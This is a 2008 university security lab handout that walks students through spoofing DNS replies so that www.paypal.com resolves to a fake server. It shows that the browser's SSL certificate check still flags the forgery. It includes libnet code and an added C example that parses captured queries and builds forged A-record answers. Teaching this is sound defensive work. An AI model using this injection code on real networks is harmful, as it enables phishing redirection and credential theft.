Lab 2: SSL Security Attack

June 17, 2008

Hyun Jin Kim
Objective
• Configure DNS such that https://www.paypal.com gets resolved to the IP address of our own "attack" server
  – PayPal uses SSL (HTTPS), so the redirected browser will still check the certificate presented by the attack server.
Normal DNS Query Processing
[Figure: the client sends a query for www.paypal.com to the DNS server, receives the answer 64.4.241.33, and connects to PayPal's server at that address.]
Attacking DNS Request
[Figure: the attacker's filter sees the client's query for www.paypal.com on the wire and injects a reply of 128.222.11.3, so the client connects to the fake PayPal server at that address instead of PayPal's real server.]
What We Will Do
• Write a program that injects a spoofed DNS response when the source queries the IP address of www.paypal.com
• C programming
• A basic code skeleton is provided.
• The attacker's fake server is also provided.
Libraries
• Libpcap
  – To capture DNS requests
  – /usr/include/pcap.h
• Libnet
  – To inject fake DNS replies
  – /usr/include/libnet.h
Procedures
• Set up packet sniffing
• Grab packets
• Check whether a packet is a DNS query
• If the query is for www.paypal.com, inject a spoofed DNS response back to the source
  – The spoofed response must reach the client before the real DNS server's answer: the client accepts the first reply whose transaction ID, port and question match its query, which is why the spoofed packet reuses the ID from the captured query.
• The web browser will be directed to the attacker's fake PayPal website!
Step 1: Packet Sniffing Setup
• Find the network interface for sniffing
  – device = pcap_lookupdev(errbuf);
     • eth0 in our case
• Set up for sniffing
  – capdev = set_cap_dev(device, filter);
     • filter specifies the properties of DNS requests (in BPF syntax this is "udp and dst port 53")
        – UDP packets
        – Destination port = 53
Step 2: Grab a DNS Query Packet
• Grab a packet (first fill-in)
  – packet = (u_char *) pcap_next(capdev, &pcap_hdr);
     • pcap_next() returns NULL when no packet was read, so check the pointer before parsing
• Check if the packet is a DNS query
  – i.e., destination port = 53 (and the QR flag in the DNS header is 0)
• Check if the DNS query is for www.paypal.com
  – decode the QNAME labels of the question section and compare them with the name
Step 3: Create Spoofed DNS Response
• Create a new DNS response carrying the attacker's IP address
• Send it back to the source
• void spoof_dns(char *device)
  – Open a raw socket (the libnet context on the device)
  – Start creating the headers for the spoofed response
Step 3: Create Spoofed DNS Response (continued)
• Header construction: libnet builds a packet from the innermost header outward, so the DNS header is built first, then UDP, then IP
  – Build DNS header (fill in)
    dns = libnet_build_dnsv4(LIBNET_DNS_H,              /* header size                      */
                             ntohs(spoofpacket.dns_id), /* dns id, copied from the query    */
                             0x8100,                    /* flags: QR=1 (response), RD=1     */
                             1,                         /* number of questions              */
                             1,                         /* number of answer RRs             */
                             0,                         /* number of authority RRs          */
                             0,                         /* number of additional RRs         */
                             spoofpacket.payload,       /* payload: question + answer RR    */
                             spoofpacket.payload_size,  /* payload length                   */
                             handler,                   /* libnet handler                   */
                             0);                        /* ptag: 0 builds a new header      */

  – Build UDP header (source port 53, destination port = the source port of the captured query)

  – Build IP header (source = the DNS server the query was sent to, destination = the querying host)

  – Calculate checksums (fill in): udp and ip are the ptags returned by the UDP and IP build calls; mode 1 (LIBNET_ON) lets libnet compute the checksums
      • libnet_toggle_checksum(handler, udp, 1);
      • libnet_toggle_checksum(handler, ip, 1);
Step 4: Inject DNS Response
• Inject the packet (fill in)
  – inject_size = libnet_write(handler);
     • returns the number of bytes written, or -1 on error
• Destroy the packet (fill in)
  – libnet_destroy(handler);
     • frees the libnet context once the packet has been sent
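The part of Steps 2 and 3 that the skeleton leaves as fill-ins is recognising the query and building the response payload. The following is an added example, not the lab's skeleton or libnet's own code: it parses the question of a captured DNS query, decides whether it asks for www.paypal.com, and builds the payload (question section plus one A record) that libnet_build_dnsv4() carries behind the 12-byte header it constructs itself. The function names, the sample query bytes, the TTL of 300 seconds and the fake address 128.222.11.3 (taken from the slides' figure) are assumptions made for this demo.

```c
/* Added example for Steps 2 and 3 of this lab; not the lab's skeleton code.
 * Parses the DNS question of a captured query, matches it against a name, and
 * builds the response payload (question + one A record) that a
 * libnet_build_dnsv4() call carries behind the 12-byte header libnet builds
 * itself. Sample query, TTL and fake address are constructed for this demo. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DNS_HDR_LEN 12   /* ID, FLAGS, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT */

/* Decode the uncompressed QNAME that starts right after the header into
 * dotted form. Returns the offset of QTYPE (just past the name), or 0 if the
 * packet is truncated or the name is malformed. */
static size_t dns_qname(const uint8_t *p, size_t len, char *out, size_t outlen)
{
    size_t pos = DNS_HDR_LEN, o = 0;
    if (len < DNS_HDR_LEN) return 0;
    while (pos < len) {
        uint8_t l = p[pos++];
        if (l == 0) { out[o] = '\0'; return pos + 4 <= len ? pos : 0; }
        if (l >= 0xC0) return 0;                    /* no compression pointers in a question */
        if (pos + l > len || o + l + 2 > outlen) return 0;
        if (o) out[o++] = '.';
        memcpy(out + o, p + pos, l);
        o += l;
        pos += l;
    }
    return 0;                                       /* ran off the end before the root label */
}

/* Is this UDP payload a standard query (QR=0) with exactly one question for name?
 * Matching is case-sensitive here; real resolvers compare names case-insensitively. */
int is_query_for(const uint8_t *p, size_t len, const char *name)
{
    char qname[256];
    if (len < DNS_HDR_LEN || (p[2] & 0x80) || p[4] != 0 || p[5] != 1) return 0;
    if (!dns_qname(p, len, qname, sizeof qname)) return 0;
    return strcmp(qname, name) == 0;
}

/* Build the response payload: the question copied verbatim, followed by one
 * answer RR whose NAME is a compression pointer (0xC00C) to the question name
 * at offset 12. Returns the payload length, or 0 if out is too small or the
 * query is malformed. The caller pairs it with the query's ID and flags 0x8100. */
size_t build_spoofed_payload(const uint8_t *q, size_t qlen, const uint8_t ip[4],
                             uint32_t ttl, uint8_t *out, size_t outlen)
{
    char qname[256];
    size_t qend = dns_qname(q, qlen, qname, sizeof qname);
    if (!qend) return 0;
    size_t qsec = qend + 4 - DNS_HDR_LEN;   /* QNAME + QTYPE + QCLASS */
    size_t n = qsec + 16;                   /* + NAME(2) TYPE(2) CLASS(2) TTL(4) RDLENGTH(2) RDATA(4) */
    if (n > outlen) return 0;
    memcpy(out, q + DNS_HDR_LEN, qsec);
    uint8_t *a = out + qsec;
    a[0] = 0xC0; a[1] = 0x0C;               /* NAME: pointer to offset 12 */
    a[2] = 0x00; a[3] = 0x01;               /* TYPE A */
    a[4] = 0x00; a[5] = 0x01;               /* CLASS IN */
    a[6] = ttl >> 24; a[7] = ttl >> 16; a[8] = ttl >> 8; a[9] = ttl;   /* TTL, big-endian */
    a[10] = 0x00; a[11] = 0x04;             /* RDLENGTH */
    memcpy(a + 12, ip, 4);                  /* RDATA: the fake server's address */
    return n;
}

/* Constructed sample: transaction ID 0x1234, flags RD, one question for
 * www.paypal.com, type A, class IN. This is the UDP payload pcap_next() would
 * hand back once the Ethernet, IP and UDP headers are skipped. */
const uint8_t sample_query[] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    3, 'w', 'w', 'w', 6, 'p', 'a', 'y', 'p', 'a', 'l', 3, 'c', 'o', 'm', 0,
    0x00, 0x01, 0x00, 0x01
};
const uint8_t fake_ip[4] = { 128, 222, 11, 3 };   /* fake PayPal server from the slides */

/* Build the response for the sample query and check the answer RR; returns the
 * payload length (36 for the sample) or 0 if the query did not match or the
 * answer does not carry fake_ip. */
size_t spoof_sample(uint8_t *out, size_t outlen)
{
    if (!is_query_for(sample_query, sizeof sample_query, "www.paypal.com")) return 0;
    size_t n = build_spoofed_payload(sample_query, sizeof sample_query, fake_ip, 300, out, outlen);
    if (n < 16 || memcmp(out + n - 4, fake_ip, 4) != 0) return 0;
    return n;
}

int main(void)
{
    uint8_t payload[512];
    size_t n = spoof_sample(payload, sizeof payload);
    printf("spoofed payload: %zu bytes\n", n);
    for (size_t i = 0; i < n; i++) printf("%02x%s", payload[i], (i + 1) % 16 ? " " : "\n");
    printf("\n");
    return n ? 0 : 1;
}
```

In the lab program the buffer returned by build_spoofed_payload() becomes spoofpacket.payload, its length spoofpacket.payload_size, and the two bytes at the start of the captured query become spoofpacket.dns_id; the UDP and IP headers built on top of it swap the captured query's ports and addresses so the reply appears to come from the DNS server.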
Test
• Compile
  – Type make
• Run
  – Type ./sslattack
• Open a web browser
• Type http://www.naver.com
  – No attack: the program only answers queries for www.paypal.com, so other names resolve normally
• Type https://www.paypal.com
  – Certificate warning: the spoofed answer sends the browser to the fake server, but that server cannot present a certificate for www.paypal.com issued by a CA the browser trusts, so SSL flags the mismatch even though the DNS redirection succeeded
[Figure: browser certificate dialogs for the spoofed paypal.com and the actual paypal.com, side by side.]

				